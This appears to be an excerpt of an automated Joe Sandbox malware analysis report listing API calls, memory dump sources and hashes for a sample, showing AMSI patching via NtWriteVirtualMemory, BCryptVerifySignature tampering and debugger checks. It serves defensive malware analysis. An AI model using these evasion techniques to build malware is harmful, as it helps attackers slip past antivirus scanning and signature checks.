                                                                                                                                      • LoadLibraryW.KERNEL32(?,?), ref: 02DC87B4
                                                                                                                                      • GetProcAddress.KERNEL32(02E11390,BCryptVerifySignature), ref: 02DC87CE
                                                                                                                                      • FreeLibrary.KERNEL32(02E11390,02E11390,BCryptVerifySignature,bcrypt,?,02E113D0,00000000,02E113A4,02DCA3C7,ScanString,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,Initialize), ref: 02DC880A
                                                                                                                                        • Part of subcall function 02DC7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7D74
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                      • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                      • API String ID: 1002360270-4067648912
                                                                                                                                      • Opcode ID: fbee287345105851f4fd6b04cacf306306dd51a6bb9401f5035a5eb8596ad5d1
                                                                                                                                      • Instruction ID: 5669723578ff26bc80b0616b4439fd5ad431daafc5c968b178b2421c742df332
                                                                                                                                      • Opcode Fuzzy Hash: fbee287345105851f4fd6b04cacf306306dd51a6bb9401f5035a5eb8596ad5d1
                                                                                                                                      • Instruction Fuzzy Hash: BAF0A471EC025C9EEB119E6AA844FB6739CDB44354F52093DB30E8FA48C7704C90CB60

Control-flow Graph

APIs
• LoadLibraryW.KERNEL32(amsi), ref: 02DC8715
  • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC811B
  • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(?,?), ref: 02DC812D
  • Part of subcall function 02DC7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7D74
• FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DC8774
Strings
Memory Dump Source
• Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
Similarity
• API ID: AddressLibraryProc$FreeLoadMemoryVirtualWrite
• String ID: DllGetClassObject$W$amsi
• API String ID: 2980007069-2671292670
• Opcode ID: 7620dc9f238aae5b3fbfebb65a3e59fa0fe7b92f4717741d7b58d382de8f491c
• Instruction ID: d236b8d27e9645079aaa4e86fed0dac23fd57e8ba37026efced9eb29caaf7971
• Opcode Fuzzy Hash: 7620dc9f238aae5b3fbfebb65a3e59fa0fe7b92f4717741d7b58d382de8f491c
• Instruction Fuzzy Hash: 1DF0815050C382B9E202A6748C45F4BAACD8B52224F148B5CF1A8973D2D675D5049BB7

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(KernelBase), ref: 02DCEC00
• GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DCEC12
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DCEC29
Strings
Memory Dump Source
• Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
Similarity
• API ID: AddressCheckDebuggerHandleModulePresentProcRemote
• String ID: CheckRemoteDebuggerPresent$KernelBase
• API String ID: 35162468-539270669
• Opcode ID: 8abcaacf3c5cf33c8753ed07399825ac3971706a46700a2c8a894639f7e61eff
• Instruction ID: b6c3d5fb154a47ddb46f84cf4e6dcd2080422498e3e5279304ef965a3bbe3d4d
• Opcode Fuzzy Hash: 8abcaacf3c5cf33c8753ed07399825ac3971706a46700a2c8a894639f7e61eff
• Instruction Fuzzy Hash: 08F0A7B090428DAAD722A7B8C9897DCFBA99B05338F7403D8D425632C1E7750E44C6A1

Control-flow Graph

APIs
• Sleep.KERNEL32(00000000), ref: 02DB1B17
• Sleep.KERNEL32(0000000A,00000000), ref: 02DB1B31
Memory Dump Source
• Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 054b4bb23c5f36c673fbaa28c62c2e7de51d71d3cb7f42a7672513bf650fad42
• Instruction ID: 7a8c1a16f65d6dab4942cbc0d6797e7d5416a2f0f11c58b3a29814df84489317
• Opcode Fuzzy Hash: 054b4bb23c5f36c673fbaa28c62c2e7de51d71d3cb7f42a7672513bf650fad42
• Instruction Fuzzy Hash: 6251BF71A44240CFEB16CB69C9B4796BBD0EF46314F1885AED44A8B386D760DC86CBA1
Memory Dump Source
• Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 596ac98dc3f8c4c84974893d5c47ac619c7167a9f776b6940c53c6b7f307908e
• Instruction ID: ec40d437c9425ac900d41ea0ecbc17db4849dc6407886d8c6be4a46bbd97f02f
• Opcode Fuzzy Hash: 596ac98dc3f8c4c84974893d5c47ac619c7167a9f776b6940c53c6b7f307908e
• Instruction Fuzzy Hash: 98414875C81204DBDB16DF29E4B47AA3BA5EF45314FA88869E80687346C7709CE1CF61
APIs
  • Part of subcall function 02DC8020: GetModuleHandleA.KERNELBASE(?), ref: 02DC8072
  • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC811B
  • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(?,?), ref: 02DC812D
  • Part of subcall function 02DC7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7D74
• FreeLibrary.KERNEL32(02E11384,00000000,02E11388,Function_000055D8,00000004,02E11398,02E11388,05F5E0FF,00000040,02E1139C,02E11384,00000000,00000000,00000000,00000000,02DC890B), ref: 02DC88EB
Memory Dump Source
• Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
Similarity
• API ID: AddressProc$FreeHandleLibraryMemoryModuleVirtualWrite
• String ID:
• API String ID: 3430646871-0
• Opcode ID: 8c5b07dafb7070891b8d95f99f6cbf0ce916d53228e142077d16e7fb7287d61d
• Instruction ID: 7d2d3462b4a4d88f16e1ad8ae99de26ab9defa03f0d744ad9db21fa7f9f9b96e
• Opcode Fuzzy Hash: 8c5b07dafb7070891b8d95f99f6cbf0ce916d53228e142077d16e7fb7287d61d
• Instruction Fuzzy Hash: 0811B770680304EBEF02FBA5D822E9E77ADDF45710F914578720AE7B45CA349D505F60
APIs
• GetModuleFileNameA.KERNEL32(026E1B20,?,00000105), ref: 02DB5832
  • Part of subcall function 02DB5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02DB5A94
  • Part of subcall function 02DB5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5AB2
  • Part of subcall function 02DB5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5AD0
  • Part of subcall function 02DB5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DB5AEE
  • Part of subcall function 02DB5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02DB5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DB5B37
  • Part of subcall function 02DB5A78: RegQueryValueExA.ADVAPI32(?,02DB5CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02DB5B7D,?,80000001), ref: 02DB5B55
  • Part of subcall function 02DB5A78: RegCloseKey.ADVAPI32(?,02DB5B84,00000000,00000000,00000005,00000000,02DB5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5B77
Memory Dump Source
• Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
Similarity
• API ID: Open$FileModuleNameQueryValue$Close
• String ID:
• API String ID: 2796650324-0
• Opcode ID: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
• Instruction ID: 0a98ba91a22c03908e992f650fcba0e3d9090d442b0e243d7572f9dbb07da741
• Opcode Fuzzy Hash: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
• Instruction Fuzzy Hash: E8E06571A00214CBCB11DE6C98D0A8637D8AF08B94F8009A5EC5ADF34AD3B0ED208BE0
APIs
• GetFileAttributesA.KERNEL32(00000000,?,02DD2A49,ScanString,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,Initialize), ref: 02DB7E47
Memory Dump Source
• Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
• Instruction ID: 7dd45264eaf03e908a8405adfaea8bb6da53d7500910518f32cb71eebff473ed
• Opcode Fuzzy Hash: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
• Instruction Fuzzy Hash: 18C08CA66022068F6F62A2FC1CE02DA42CA8E88534BA01B31E03AD63C2D311DC222420
APIs
• timeSetEvent.WINMM(?,00000000), ref: 02DDBB60
Memory Dump Source
• Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
Similarity
• API ID: Eventtime
• String ID:
• API String ID: 2982266575-0
• Opcode ID: a3644a37415c9ce226de77cd21f88448b47dcb5f59ad4de5147687fd09ce9313
• Instruction ID: 6b8a69062ffb6dfb0a3aa20ff8c5288353764f7eff23367c48eee31af79f27d7
• Opcode Fuzzy Hash: a3644a37415c9ce226de77cd21f88448b47dcb5f59ad4de5147687fd09ce9313
• Instruction Fuzzy Hash: C7C092F0B913007EF62056A81CD2F63A1CDF704B09F610412BA01EE3D6D5E24C600A38
                                                                                                                                      APIs
                                                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02DB4BEB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2525500382-0
                                                                                                                                      • Opcode ID: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                                                                                                                      • Instruction ID: 736b5de74196028e15403c0caa30d2693662dc39a8be7f03bd93c173f1d749ba
                                                                                                                                      • Opcode Fuzzy Hash: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                                                                                                                      • Instruction Fuzzy Hash: 65B09228648202D8EA1691620D31BF2008C4F5068AF8400A19F6BC8381EB00CC00C83A
                                                                                                                                      APIs
                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 02DB4C03
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3341692771-0
                                                                                                                                      • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                      • Instruction ID: ac5c435cc18653b664f204761055910ce4940443d5b6787e1c93f0c25b3211f9
                                                                                                                                      • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                      • Instruction Fuzzy Hash: 6BA011A88002028A8E0B222800300AA2032AEE0A02B8AC0A800020A2008A2A8800A838
                                                                                                                                      APIs
                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02DB16A4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: 1e287d79e3f341764a96a7a1c5ead6ed56b39d1b8237514d6fbd5c8916ae9d81
                                                                                                                                      • Instruction ID: 0b136c7677bf846cffec902dff147e69f61bf464813999b24a3215bce490b28b
                                                                                                                                      • Opcode Fuzzy Hash: 1e287d79e3f341764a96a7a1c5ead6ed56b39d1b8237514d6fbd5c8916ae9d81
                                                                                                                                      • Instruction Fuzzy Hash: 5DF090B2A80795ABD712AF5ADC90782BB94FF00314F454139F94897340D770EC90CBD4
                                                                                                                                      APIs
                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02DB1704
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                      • Opcode ID: a7e77cd9f554437f4d0eb2781b761697678b3a9a335b5248c624b8d6e7d5ac83
                                                                                                                                      • Instruction ID: 8d650c853030fb67b06184682e4669ecc40753832e2855baeaa2068a7098ec79
                                                                                                                                      • Opcode Fuzzy Hash: a7e77cd9f554437f4d0eb2781b761697678b3a9a335b5248c624b8d6e7d5ac83
                                                                                                                                      • Instruction Fuzzy Hash: 5FE0DF71300300EFE7105A3D4C607926AC8EF44620F244575F54ACB3C1C2A0DC108B20